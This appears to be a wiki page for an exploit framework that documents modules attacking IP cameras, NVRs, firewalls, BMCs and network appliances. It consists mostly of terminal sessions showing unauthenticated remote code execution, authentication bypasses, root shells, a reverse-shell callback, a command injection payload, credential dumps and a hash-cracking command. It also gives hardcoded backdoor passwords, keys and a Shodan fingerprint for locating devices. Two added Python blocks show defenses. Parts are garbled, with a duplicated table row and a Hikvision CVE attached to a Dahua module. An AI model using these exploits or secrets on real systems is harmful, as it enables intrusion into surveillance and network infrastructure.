Exploit Modules

André Henrique edited this page Jun 8, 2026 · 4 revisions

Language: English (en-US) | pt-BR: ../pt-BR/06-modulos-exploits.md


Overview

Exploit modules target specific vulnerabilities in network devices and embedded systems. They cover unauthenticated RCE, authentication bypass, path traversal, information/credential disclosure, SQLi, command injection, firmware upload without verification, and post-exploitation privilege escalation.

Authorization required. Use only on systems you own or have explicit written permission to test.

Standard workflow

exf > use exploits/<category>/<vendor>/<module_name>
exf (ModuleName) > set target <ip>
exf (ModuleName) > set port <port>          # if non-default
exf (ModuleName) > show options             # review all options
exf (ModuleName) > check                    # optional: verify vulnerability
exf (ModuleName) > run                      # execute

Module directory structure

embedxpl/modules/exploits/
├── appliances/
│   ├── citrix/       Citrix NetScaler path traversal (CVE-2019-19781), RCE (CVE-2023-3519)
│   └── f5/           F5 BIG-IP iControl REST RCE (CVE-2022-1388), BIG-IQ RCE (CVE-2021-22986)
├── aps/
│   └── mediatek/     MT7622 heap/stack overflow (pre/post-auth variants)
├── bmc/
│   ├── asus/         ASMB8 IPMI default creds
│   ├── dell/         iDRAC9 info disclosure (CVE-2021-36300)
│   └── supermicro/   IPMI RAKP auth bypass (CVE-2013-4786)
├── bms/
│   └── abb/          Cylon Aspect default creds
├── cameras/          (40+ camera vendor subfolders — see below)
├── cisco/            Cisco IOS Smart Install RCE (CVE-2018-0171)
├── firewalls/        Fortinet, Palo Alto, Cisco ASA, SonicWall, etc.
├── ...

Camera exploits

Hikvision

| Module | CVE | CVSS | Type |
|---|---|---|---|
| rtsp_rce_cve_2021_36260 | CVE-2021-36260 | 9.8 | Unauthenticated RCE via HTTP PUT /SDK/webLanguage |
| info_disclosure_cve_2017_7921 | CVE-2017-7921 | 9.8 | Unauthenticated config/credential disclosure |
| nas_auth_bypass_cve_2023_28808 | CVE-2023-28808 | 9.8 | NAS auth bypass |
| firmware_crypto_key_extract | | High | Extracts hardcoded firmware crypto keys |
| nvr_dvr_serial_privesc | | High | Serial number-based privilege escalation |
| psh_challenge_predictor | | Critical | PSH challenge token prediction |
| psh_command_injection | | Critical | PSH command injection |
| psh_debug_rsa1024_bypass | | Critical | PSH debug RSA-1024 bypass |
| r0_intercom_3des_decrypt | | High | DS-KD8003 intercom 3DES key extraction |
| r0_intercom_developer_nfs | | Critical | Intercom developer NFS root mount |
| r0_intercom_gpio_door_unlock | | Critical | GPIO-triggered door unlock |
| r0_intercom_ssh_default_bypass | | High | Intercom SSH default credential bypass |
| r0_intercom_ssh_mitm | | High | Intercom SSH MITM via key reuse |
| r0_intercom_suid_privesc | | High | SUID binary privilege escalation |
r0_intercom_suid_privesc High SUID binary privilege escalation

Options (CVE-2021-36260):

| Option | Type | Required | Default | Description |
|---|---|---|---|---|
| target | OptIP | Yes | "" | Target IPv4 address |
| port | OptPort | No | 80 | HTTP port |
| ssl | OptBool | No | False | Use HTTPS |
| command | OptString | No | id | OS command to inject |

Terminal session — CVE-2021-36260 (RCE):

exf > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
exf (Hikvision Unauthenticated RCE) > set target 192.168.1.100
[+] target => 192.168.1.100
exf (Hikvision Unauthenticated RCE) > set command "id; uname -a; cat /etc/passwd"
[+] command => id; uname -a; cat /etc/passwd
exf (Hikvision Unauthenticated RCE) > check
[+] Target is vulnerable
exf (Hikvision Unauthenticated RCE) > run
[*] Running module ...
[*] Checking if 192.168.1.100:80 is a Hikvision device...
[*] Attempting CVE-2021-36260 RCE on 192.168.1.100...
[*] Response HTTP 400: <?xml version="1.0" encoding="UTF-8"?><ResponseStatus ...>
[+] CVE-2021-36260: Payload delivered to 192.168.1.100:80. Monitor for callback.
[!] Verify execution via OOB (e.g., Burp Collaborator or Interactsh).

Terminal session — check returns not vulnerable:

exf (Hikvision Unauthenticated RCE) > set target 10.0.0.5
[+] target => 10.0.0.5
exf (Hikvision Unauthenticated RCE) > check
[-] Target is not vulnerable

Dahua

| Module | CVE / Ref | CVSS | Type |
|---|---|---|---|
| auth_bypass_cve_2021_33044 | CVE-2021-33044 | 9.8 | Authentication bypass |
| cctv_auth_bypass_cve_2021_33044 | CVE-2021-33044 | 9.8 | CCTV variant |
| cctv_rce_cve_2021_36260 | CVE-2021-36260 / DAHUA-2026-006 | 9.8 | configManager.cgi command injection |
| cctv_37777_credential_extraction | | High | Port 37777 credential extraction |
| cctv_firmware_upload_no_verify | | High | Unsigned firmware upload |
| cctv_pem_key_extraction | | High | PEM key extraction from NVR |
| cctv_username_disclosure_cve_2020_25078 | CVE-2020-25078 | 7.5 | Username disclosure |
| dvr_auth_bypass_cve_2013_6117 | CVE-2013-6117 | 9.8 | Old DVR auth bypass |

Options (cctv_rce_cve_2021_36260):

| Option | Type | Required | Default | Description |
|---|---|---|---|---|
| target | OptIP | Yes | "" | Target IPv4 |
| port | OptPort | No | 80 | HTTP port |

Terminal session — Dahua configManager.cgi RCE:

exf > use exploits/cameras/dahua/cctv_rce_cve_2021_36260
exf (Dahua RCE CVE-2021-36260 (DAHUA-2026-006)) > set target 192.168.1.50
[+] target => 192.168.1.50
exf (Dahua RCE CVE-2021-36260 (DAHUA-2026-006)) > check
[+] Target is vulnerable
exf (Dahua RCE CVE-2021-36260 (DAHUA-2026-006)) > run
[*] Running module ...
[*] Probing CVE-2021-36260 indicators at 192.168.1.50...
[+] [CRITICAL] configManager.cgi accessible without auth — CVE-2021-36260 likely exploitable
[*] Response preview: Network.Eth0.IPVersion=IPv4
Network.Eth0.IPAddress=192.168.1.50
Network.Eth0.SubnetMask=255.255.255.0
Network.Eth0.DefaultGateway=192.168.1.1...
[*] Full exploitation requires sending crafted mutate payload to configManager.cgi action=setConfig

Terminal session — Dahua auth bypass CVE-2021-33044:

exf > use exploits/cameras/dahua/auth_bypass_cve_2021_33044
exf (Dahua Auth Bypass CVE-2021-33044) > set target 192.168.1.50
[+] target => 192.168.1.50
exf (Dahua Auth Bypass CVE-2021-33044) > run
[*] Running module ...
[*] Sending bypass request to 192.168.1.50:80...
[+] Authentication bypassed — session token obtained
[+] Dahua user list: admin (admin), user (user), default (user)

Herospeed / Longsee NVR Platform

The Herospeed/Longsee platform (SoC: SiGmaStar MC6830, ARM Cortex-A7) underpins all devices in this family. All module identifiers below are prefixed with exploits/cameras/herospeed/.

Affected vendors:

| Brand | Models | Firmware |
|---|---|---|
| Herospeed | N3009, N3016, N3109, N3116, N3216, N3332, N3664, NVR_F30 | v2.0.4 – v2.1.x |
| TVT Digital | TD-3000H1, TD-3300 | V21.1.x, V22.1.x |
| GISE | V5 series (XVR/NVR) | V21.1.20.x – V21.1.27.x |
| Longse | LSN-9836, LSN-9436 | Web v6.0 (2021-2023) |
| Zintronic | P5 / NVR | N9000 platform |
| Turing AI | SMART series | N9000 platform |
| Speco | ZIP series | OEM TVT |
| Alibi Security | Vigilant series | OEM TVT |
| IRBIS | MBD6804T-EL | V4.02.R11 |

Shodan fingerprint: http.html:"statics/js/variable.js" — identifies all OEM brands.

| Module | Advisory | CVSS | Type |
|---|---|---|---|
| herospeed_nvr_unauth_account_enum | HSLS-2026-001 | 9.1 | Unauthenticated account enumeration via /api/session/login-capabilities |
| herospeed_nvr_vbhtm_cred_disclosure | HSLS-2026-002 | 6.5 | /vb.htm?selectalluserlist returns all passwords in Base64 |
| herospeed_nvr_upgrade_source_injection_rce | HSLS-2026-003 | 8.8 | update.sh source injection (v2.0.4) + retreat.sh 0day (v2.0.6+) |
| herospeed_nvr_hardcoded_root_hash | HSLS-2026-004 | 9.8 | Root hash 12ZpTwfyH6/Bs (cxlinux) identical in ALL versions |
| herospeed_nvr_config_export_cred_recovery | HSLS-2026-005 | 8.8 | Hardcoded AES key decrypts full config export |
| herospeed_nvr_ftp_diagnostic_rce | HSLS-2026-006-A | 8.8 | FTP server field → popen() → root RCE |
| herospeed_nvr_ftp_sqlite_injection_rce | | 8.8 | SQLite t_ftp_info backtick injection → root RCE |
| herospeed_nvr_rce | | 9.8 | Post-auth API command injection chain |
| herospeed_nvr_telnet_safecode_backdoor | | 9.8 | /open_telnet + SafeCode from MAC/SN → root shell |
| herospeed_nvr_paramconfig_bypass | | 9.8 | Hardcoded bypass MI1YSANORQ4NAELR for /paramconfig and /cmdlist.htm |
| herospeed_nvr_camera_creds_decrypt | | 7.5 | Camera credential decryption (AES-128-CBC, salt World!@##$) |
| herospeed_nvr_v6_db_decryptor | | 8.8 | Offline DES-ECB blob decrypt (key 13141314) |

Terminal session — HSLS-2026-001 unauthenticated account enumeration:

exf > use exploits/cameras/herospeed/herospeed_nvr_unauth_account_enum
exf (Herospeed/Longsee NVR Unauthenticated Account Enumeration) > set target 192.168.1.60
[+] target => 192.168.1.60
exf (Herospeed/Longsee NVR Unauthenticated Account Enumeration) > show options

Target options:
┌────────┬──────────────────┬─────────────────────────────────────────┐
│ Name   │ Current settings │ Description                             │
├────────┼──────────────────┼─────────────────────────────────────────┤
│ target │ 192.168.1.60     │ Target IPv4 address                     │
│ port   │ 80               │ HTTP port                               │
└────────┴──────────────────┴─────────────────────────────────────────┘

exf (Herospeed/Longsee NVR Unauthenticated Account Enumeration) > run
[*] Running module ...
[*] Probing Herospeed/Longsee NVR at 192.168.1.60:80...
[*] Querying /api/session/login-capabilities for user 'admin'...
[+] Salt: a3f2b9c1d4e0f12345678901234567890abcdef0123456789abcdef0123456789
[+] Challenge: 7d2e1a9b4f3c0e5d8a6b2f7e1c4d9b3a
[+] Iterations: 100000
[+] SessionID: 4f8c2e1b-3d7a-4f2e-9b1c-8a5d2e7f3b4c
[+] Account 'admin' exists (salt returned) — HSLS-2026-001 confirmed
[*] Querying for user 'operator'...
[+] Account 'operator' exists
[*] Querying for user 'viewer'...
[-] User 'viewer' does not exist (no salt returned)
[+] Discovered accounts: admin, operator
[+] HSLS-2026-001: Unauthenticated account enumeration successful on 192.168.1.60
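The session above distinguishes accounts by whether a salt comes back. The following is an added example (not code from the module or from the vendor firmware) of a login-capabilities handler that closes that oracle by returning a stable decoy salt for unknown names; the handler names, salt size and sample data are assumptions.

```python
import hashlib
import hmac
import secrets
import uuid

ITERATIONS = 100000  # iteration count shown in the session output above
SALT_BYTES = 32      # assumed salt size

# Constructed sample data, not taken from any device.
SAMPLE_SALTS = {
    "admin": hashlib.sha256(b"constructed-admin").digest(),
    "operator": hashlib.sha256(b"constructed-operator").digest(),
}
SAMPLE_DECOY_KEY = b"constructed-decoy-key-32-bytes!!"


def _session_fields() -> dict:
    """Per-request values that are returned for every username."""
    return {
        "challenge": secrets.token_hex(16),
        "iterations": ITERATIONS,
        "sessionID": str(uuid.uuid4()),
    }


def capabilities_leaky(user_salts: dict, username: str) -> dict:
    """Behaviour seen in the session output: a salt only for real accounts."""
    resp = _session_fields()
    if username in user_salts:
        resp["salt"] = user_salts[username].hex()
    return resp


def capabilities_uniform(user_salts: dict, decoy_key: bytes, username: str) -> dict:
    """Same fields for every username; unknown names get a stable decoy salt."""
    salt = user_salts.get(username)
    if salt is None:
        # Keyed and deterministic: asking twice returns the same decoy, so a
        # salt that changes between requests cannot become a second oracle.
        salt = hmac.new(decoy_key, username.encode(), hashlib.sha256).digest()[:SALT_BYTES]
    resp = _session_fields()
    resp["salt"] = salt.hex()
    return resp


def shape(resp: dict) -> tuple:
    """Field names and value lengths: what a remote client can compare."""
    return tuple(sorted((k, len(str(v))) for k, v in resp.items()))


if __name__ == "__main__":
    for name in ("admin", "viewer"):
        print(name, shape(capabilities_leaky(SAMPLE_SALTS, name)))
        print(name, shape(capabilities_uniform(SAMPLE_SALTS, SAMPLE_DECOY_KEY, name)))
```

The later authentication step has to fail identically for decoy and real accounts, and the endpoint still needs rate limiting, or the difference reappears there.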

Terminal session — Herospeed telnet SafeCode backdoor:

exf > use exploits/cameras/herospeed/herospeed_nvr_telnet_safecode_backdoor
exf (Herospeed NVR Telnet SafeCode Backdoor) > set target 192.168.1.60
[+] target => 192.168.1.60
exf (Herospeed NVR Telnet SafeCode Backdoor) > set mac 2C6F512D50DD
[+] mac => 2C6F512D50DD
exf (Herospeed NVR Telnet SafeCode Backdoor) > run
[*] Running module ...
[*] Computing SafeCode from MAC 2C6F512D50DD using hardcoded AES key...
[+] SafeCode: 3A7F2D1E9C4B
[*] Requesting telnet activation via POST /open_telnet...
[+] Telnet activated on 192.168.1.60:23
[*] Connecting with root / SafeCode (password: cxlinux)...
[+] Root shell obtained!

~ # id
uid=0(root) gid=0(root) groups=0(root)
~ # cat /etc/passwd | head -3
root:12ZpTwfyH6/Bs:0:0:root:/root:/bin/sh
nobody:*:65534:65534:nobody:/home:/bin/false

Terminal session — Herospeed post-auth RCE chain:

exf > use exploits/cameras/herospeed/herospeed_nvr_rce
exf (Herospeed NVR RCE) > set target 192.168.1.60
[+] target => 192.168.1.60
exf (Herospeed NVR RCE) > set username admin
[+] username => admin
exf (Herospeed NVR RCE) > set password admin
[+] password => admin
exf (Herospeed NVR RCE) > run
[*] Running module ...
[*] Step 1: Fetching login capabilities (salt + challenge)...
[+] Salt: a3f2b9c1...  Challenge: 7d2e1a9b...
[*] Step 2: Computing SHA-256 multi-round hash...
[*] Step 3: Authenticating with derived hash...
[+] Authenticated — session token: sess_4f8c2e1b
[*] Step 4: Injecting OS command via diagnostic endpoint...
[*] POST /api/network/diagnostic: {"host": "127.0.0.1;id", "type": "ping"}
[+] Command output: uid=0(root) gid=0(root) groups=0(root)
[+] RCE confirmed — root shell via command injection

Other camera vendors

| Vendor | Module | CVE | Type |
|---|---|---|---|
| Axis | app_install_rce | | App installation RCE |
| Axis | srv_parhand_rce_cve_2018_10660 | CVE-2018-10660 | parhand service RCE |
| Amcrest | amcrest_camera_unauth_info_disclosure_cve_2019_3950 | CVE-2019-3950 | Unauthenticated info disclosure |
| Annke | annke_dvr_nvr_unauth_rce_cve_2021_32941 | CVE-2021-32941 | Unauthenticated RCE |
| ACTi | acm_5611_rce | | RCE in ACTi ACM-5611 |
| Beward | n100_rce | | N100 RCE |
| Brickcom | corp_network_cameras_conf_disclosure | | Config disclosure |
| Brickcom | users_cgi_creds_disclosure | | Credential disclosure |
| Cisco (cameras) | video_surv_path_traversal | | Path traversal |
| D-Link | dcs_930l_932l_auth_bypass | | Auth bypass |
| D-Link | dcs_931l_file_upload_rce_cve_2015_2049 | CVE-2015-2049 | File upload RCE |
| Edimax | ic7100_unauth_rce_cve_2025_1316 | CVE-2025-1316 | Unauthenticated RCE |
| Geuterbruck | efd_2250 | | EFD-2250 exploit |
| Grandstream | gxv3611hd_ip_camera_backdoor | | Hardcoded backdoor |
| Grandstream | gxv3611hd_ip_camera_sqli | | SQLi |
| Honeywell | hicc_1100pt_password_disclosure | | Password disclosure |
| Intelbras | cctv_dahua_auth_bypass, cctv_dahua_rce_cve_2021_36260, etc. | | Various Dahua OEM variants |
| Jovision | jovision_credentials_disclosure | | Credential disclosure |
| MotionEye | motioneye_rce_cve_2025_60787 | CVE-2025-60787 | Unauthenticated RCE |
| MVPower | dvr_jaws_rce | | JAWS webserver RCE |
| Reolink | reolink_baicells_auth_bypass_rce_cve_2021_40655 | CVE-2021-40655 | Auth bypass + RCE |
| Reolink NVR | reolink_nvr_p2p_uid_extract_cve_2022_30600 | CVE-2022-30600 | P2P UID extraction |
| Siemens | cvms2025_credentials_disclosure | | Credential disclosure |
| Swann | swann_dvr_nvr_default_creds_rtsp | | RTSP default creds |
| Tapo | tapo_c200_c210_unauth_rce_cve_2021_4045 | CVE-2021-4045 | Unauthenticated RCE |
| Uniview | uniview_nvr_unauth_rce_cve_2024_37630 | CVE-2024-37630 | Unauthenticated RCE |
| Xiongmai | uc_httpd_path_traversal | | uc-httpd path traversal |
| Zivif | ipcheck_rce_cve_2017_17105 | CVE-2017-17105 | RCE via ipcheck |

Firewall / VPN appliance exploits

| Module path | CVE | CVSS | Description |
|---|---|---|---|
| exploits/firewalls/fortinet/fortios_auth_bypass_cve_2022_40684 | CVE-2022-40684 | 9.8 | FortiOS admin authentication bypass |
| exploits/firewalls/paloalto/globalprotect_auth_bypass_cve_2026_0257 | CVE-2026-0257 | 7.8 | GlobalProtect auth override cookie bypass (CISA KEV) |
| exploits/firewalls/fortinet/forticlient_ems_preauth_rce_cve_2026_35616 | CVE-2026-35616 | 9.8 | FortiClient EMS pre-auth RCE |
| exploits/firewalls/fortinet/fortios_sslvpn_path_traversal_cve_2018_13379 | CVE-2018-13379 | 9.8 | FortiOS SSL-VPN path traversal |

Terminal session — FortiOS Auth Bypass (CVE-2022-40684):

exf > use exploits/firewalls/fortinet/fortios_auth_bypass_cve_2022_40684
exf (FortiOS Auth Bypass CVE-2022-40684) > set target 10.0.0.5
[+] target => 10.0.0.5
exf (FortiOS Auth Bypass CVE-2022-40684) > check
[+] Target is vulnerable
exf (FortiOS Auth Bypass CVE-2022-40684) > run
[*] Running module ...
[*] FortiOS at 10.0.0.5:443 — auth bypass phase 1
[+] Bypass active using 'Forwarded: for="[127.0.0.1]";by="[127.0.0.1]"' header variant
[*] Phase 2 — admin accounts dump via /api/v2/cmdb/system/admin...
[+] Admin Accounts: {"results": [{"name": "admin", "type": "super_admin", "email": ""}]}
[*] Phase 3 — system info...
[+] FortiOS Version: FortiGate-60F v7.0.6
[*] Phase 4 — VPN users dump...
[+] VPN Users: {"results": [{"name": "vpnuser1", ...}]}
[*] Phase 5 — Shell staging (type: auto)...
[+] Shell callback received
$ id
uid=0(root) gid=0(root)

Terminal session — PAN-OS GlobalProtect (CVE-2026-0257):

exf > use exploits/firewalls/paloalto/globalprotect_auth_bypass_cve_2026_0257
exf (PAN-OS GlobalProtect Auth Override Cookie Bypass) > set target 203.0.113.10
[+] target => 203.0.113.10
exf (PAN-OS GlobalProtect Auth Override Cookie Bypass) > set forge_user admin
[+] forge_user => admin
exf (PAN-OS GlobalProtect Auth Override Cookie Bypass) > set lhost 10.0.0.99
[+] lhost => 10.0.0.99
exf (PAN-OS GlobalProtect Auth Override Cookie Bypass) > set shell_type python
[+] shell_type => python
exf (PAN-OS GlobalProtect Auth Override Cookie Bypass) > check
[+] Target is vulnerable
exf (PAN-OS GlobalProtect Auth Override Cookie Bypass) > run
[*] Running module ...
[*] Extracting RSA public key from TLS certificate...
[+] Public key extracted (2048-bit RSA)
[*] Forging auth override cookie for user: admin
[*] Submitting cookie to /ssl-vpn/prelogin.esp...
[+] VPN session granted for user: admin
[*] Session metadata: {...}
[*] Shell staging (type: python)...
[shell] Listening on 0.0.0.0:4444...
[shell] Connection received from 203.0.113.10
$ whoami
admin

How CVE-2026-0257 works: GlobalProtect encrypts an identity blob (username;domain;client_os;host_id;timestamp;client_ip) with RSA-PKCS1v15 using the public key of the HTTPS TLS certificate. The module extracts that public key from the TLS handshake, forges a cookie for admin, and submits it to /ssl-vpn/prelogin.esp. The gpsvc daemon decrypts the cookie and trusts the username without signature verification, so a ciphertext that decrypts cleanly is accepted even though anyone who can read the certificate can produce one.

Requirements: (1) Auth override cookies enabled in GP config, AND (2) same certificate used for both cookie encryption and HTTPS service. Patched in PAN-OS 12.1.7, 11.2.12, 11.1.15, 10.2.18-h6.
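The missing control in the design described above is origin authentication. The following is an added example (not Palo Alto's code and not the module's) of an identity cookie that is accepted only with a valid HMAC tag under a gateway-held secret; the field order comes from the paragraph above, while the function names, lifetime, epoch-seconds timestamp and client-IP binding are assumptions.

```python
import base64
import hashlib
import hmac
import time

# Field order follows the identity blob described above.
FIELDS = ("username", "domain", "client_os", "host_id", "timestamp", "client_ip")
MAX_AGE = 24 * 3600  # assumed cookie lifetime in seconds


class CookieError(Exception):
    """Cookie failed the integrity, format, freshness or binding check."""


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode()


def issue_cookie(secret: bytes, identity: dict) -> str:
    """Serialize the identity fields and append an HMAC-SHA256 tag."""
    values = [str(identity[name]) for name in FIELDS]
    if any(";" in v for v in values):
        raise ValueError("field value contains the ';' separator")
    blob = ";".join(values).encode()
    tag = hmac.new(secret, blob, hashlib.sha256).digest()
    return _b64(blob) + "." + _b64(tag)


def verify_cookie(secret: bytes, cookie: str, client_ip: str, now=None) -> dict:
    """Return the identity only if tag, age and client binding all check out."""
    try:
        blob_b64, tag_b64 = cookie.split(".")
        blob = base64.urlsafe_b64decode(blob_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except ValueError as exc:  # wrong part count or bad base64
        raise CookieError("malformed cookie") from exc
    expected = hmac.new(secret, blob, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        raise CookieError("tag mismatch: cookie was not issued by this gateway")
    # Fields are parsed only after the tag has been verified.
    identity = dict(zip(FIELDS, blob.decode().split(";")))
    age = (time.time() if now is None else now) - int(identity["timestamp"])
    if not 0 <= age <= MAX_AGE:
        raise CookieError("cookie expired or dated in the future")
    if identity["client_ip"] != client_ip:
        raise CookieError("cookie presented from a different address")
    return identity


def is_valid(secret: bytes, cookie: str, client_ip: str, now=None) -> bool:
    """Boolean wrapper around verify_cookie for callers that only gate access."""
    try:
        verify_cookie(secret, cookie, client_ip, now)
        return True
    except CookieError:
        return False
```

A cookie built by anyone who lacks the secret fails at the tag comparison, before any field is read. The secret must be separate from the TLS key material, which is the second requirement listed above.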


Appliance exploits

F5 BIG-IP

| Module | CVE | CVSS | Type |
|---|---|---|---|
| exploits/appliances/f5/bigip_icontrol_rest_rce_cve_2022_1388 | CVE-2022-1388 | 9.8 | iControl REST unauthenticated RCE |
| exploits/appliances/f5/bigip_bigiq_icontrol_rce_cve_2021_22986 | CVE-2021-22986 | 9.8 | BIG-IQ iControl RCE |

Terminal session — CVE-2022-1388:

exf > use exploits/appliances/f5/bigip_icontrol_rest_rce_cve_2022_1388
exf (F5 BIG-IP iControl REST RCE) > set target 10.1.1.10
[+] target => 10.1.1.10
exf (F5 BIG-IP iControl REST RCE) > set command id
[+] command => id
exf (F5 BIG-IP iControl REST RCE) > run
[*] Running module ...
[*] Sending CVE-2022-1388 authentication bypass request to 10.1.1.10:443...
[+] Authentication bypassed via X-F5-Auth-Token + Connection: X-Forward-Auth header chain
[*] Executing command: id
[+] uid=0(root) gid=0(root) groups=0(root)

Citrix NetScaler

| Module | CVE | CVSS | Type |
|---|---|---|---|
| exploits/appliances/citrix/netscaler_path_traversal_cve_2019_19781 | CVE-2019-19781 | 9.8 | Path traversal (Shitrix) |
| exploits/appliances/citrix/netscaler_rce_cve_2023_3519 | CVE-2023-3519 | 9.8 | Unauthenticated RCE |

BMC / IPMI exploits

| Module | CVE | CVSS | Type |
|---|---|---|---|
| exploits/bmc/supermicro/ipmi_auth_bypass_cve_2013_4786 | CVE-2013-4786 | 10.0 | IPMI 2.0 RAKP HMAC hash disclosure |
| exploits/bmc/dell/idrac9_info_disclosure_cve_2021_36300 | CVE-2021-36300 | 9.8 | Dell iDRAC9 unauthenticated info disclosure |
| exploits/bmc/asus/asmb8_default_creds_ipmi | | High | ASUS ASMB8 IPMI default credentials |

Terminal session — Supermicro IPMI RAKP (CVE-2013-4786):

exf > use exploits/bmc/supermicro/ipmi_auth_bypass_cve_2013_4786
exf (Supermicro IPMI RAKP Auth Bypass) > set target 10.0.1.5
[+] target => 10.0.1.5
exf (Supermicro IPMI RAKP Auth Bypass) > run
[*] Running module ...
[*] Sending IPMI 2.0 RAKP Message 1 to 10.0.1.5:623 (UDP)...
[+] HMAC hash obtained for user 'admin':
    $rakp$a4e7f2b9c1d4e0f1$0123456789abcdef$admin$c3d2e1f09a8b7c6d5e4f3a2b1c0d9e8f...
[+] Crack offline with: hashcat -m 7300 hash.txt /usr/share/wordlists/rockyou.txt

Cisco exploits

| Module | CVE | CVSS | Type |
|---|---|---|---|
| exploits/cisco/cisco_ios_smart_install_rce_cve_2018_0171 | CVE-2018-0171 | 9.8 | IOS Smart Install unauthenticated RCE |

APs (Access Points) — MediaTek

| Module | CVSS | Type |
|---|---|---|
| exploits/aps/mediatek/mt7622_heap_overflow_preauth | 9.8 | Pre-auth heap overflow |
| exploits/aps/mediatek/mt7622_heap_overflow_postauth | 8.8 | Post-auth heap overflow |
| exploits/aps/mediatek/mt7622_stack_overflow_preauth | 9.8 | Pre-auth stack overflow |
| exploits/aps/mediatek/mt7622_stack_overflow_postauth | 8.8 | Post-auth stack overflow |

Multi-camera exploits

| Module | Type |
|---|---|
| exploits/cameras/multi/cctv_dvr_rce | Generic CCTV/DVR RCE |
| exploits/cameras/multi/dvr_creds_disclosure | Generic DVR credential disclosure |
| exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal | JVC/Vanderbilt/Honeywell path traversal |
| exploits/cameras/multi/netwave_ip_camera_information_disclosure | NetWave camera info disclosure |
| exploits/cameras/multi/P2P_wificam_credential_disclosure | P2P Wi-Fi cam credential disclosure |
| exploits/cameras/multi/P2P_wificam_rce | P2P Wi-Fi cam RCE |
| exploits/cameras/multi/rtsp_cameradar_attack | RTSP full attack chain (route + credential brute-force) |

Notable 2026 CVEs

| CVE | CVSS | Module path | Description |
|---|---|---|---|
| CVE-2026-0257 | 7.8 | exploits/firewalls/paloalto/globalprotect_auth_bypass_cve_2026_0257 | PAN-OS GlobalProtect auth override cookie bypass (CISA KEV 2026-05-29) |
| CVE-2026-35616 | 9.8 | exploits/firewalls/fortinet/forticlient_ems_preauth_rce_cve_2026_35616 | FortiClient EMS pre-auth RCE |
| CVE-2025-20188 | 10.0 | exploits/routers/cisco/ios_xe_wlc_jwt_file_upload_cve_2025_20188 | Cisco IOS XE WLC hardcoded JWT file upload RCE |
| CVE-2025-1316 | 9.8 | exploits/cameras/edimax/ic7100_unauth_rce_cve_2025_1316 | Edimax IC-7100 unauthenticated RCE |
| CVE-2024-37630 | 9.8 | exploits/cameras/uniview/uniview_nvr_unauth_rce_cve_2024_37630 | Uniview NVR unauthenticated RCE |
| CVE-2022-1388 | 9.8 | exploits/appliances/f5/bigip_icontrol_rest_rce_cve_2022_1388 | F5 BIG-IP iControl REST unauthenticated RCE |
| CVE-2022-40684 | 9.8 | exploits/firewalls/fortinet/fortios_auth_bypass_cve_2022_40684 | FortiOS admin auth bypass |
| CVE-2023-28808 | 9.8 | exploits/cameras/hikvision/nas_auth_bypass_cve_2023_28808 | Hikvision NAS auth bypass |
| CVE-2021-36260 | 9.8 | exploits/cameras/hikvision/rtsp_rce_cve_2021_36260 | Hikvision unauthenticated RCE |
| CVE-2021-36260 | 9.8 | exploits/cameras/dahua/cctv_rce_cve_2021_36260 | Dahua configManager.cgi RCE |
| CVE-2021-33044 | 9.8 | exploits/cameras/dahua/auth_bypass_cve_2021_33044 | Dahua auth bypass |
| CVE-2021-40655 | 9.8 | exploits/cameras/reolink/reolink_baicells_auth_bypass_rce_cve_2021_40655 | Reolink auth bypass + RCE |
| CVE-2021-4045 | 9.8 | exploits/cameras/tapo/tapo_c200_c210_unauth_rce_cve_2021_4045 | TP-Link Tapo unauthenticated RCE |
| CVE-2021-22986 | 9.8 | exploits/appliances/f5/bigip_bigiq_icontrol_rce_cve_2021_22986 | F5 BIG-IQ iControl RCE |
| CVE-2019-19781 | 9.8 | exploits/appliances/citrix/netscaler_path_traversal_cve_2019_19781 | Citrix NetScaler path traversal |
| CVE-2018-10660 | 9.8 | exploits/cameras/axis/srv_parhand_rce_cve_2018_10660 | Axis parhand RCE |
| CVE-2018-0171 | 9.8 | exploits/cisco/cisco_ios_smart_install_rce_cve_2018_0171 | Cisco IOS Smart Install RCE |
| CVE-2017-7921 | 9.8 | exploits/cameras/hikvision/info_disclosure_cve_2017_7921 | Hikvision unauthenticated info disclosure |
| CVE-2013-4786 | 10.0 | exploits/bmc/supermicro/ipmi_auth_bypass_cve_2013_4786 | Supermicro IPMI RAKP hash disclosure |
| CVE-2013-6117 | 9.8 | exploits/cameras/dahua/dvr_auth_bypass_cve_2013_6117 | Old Dahua DVR auth bypass |
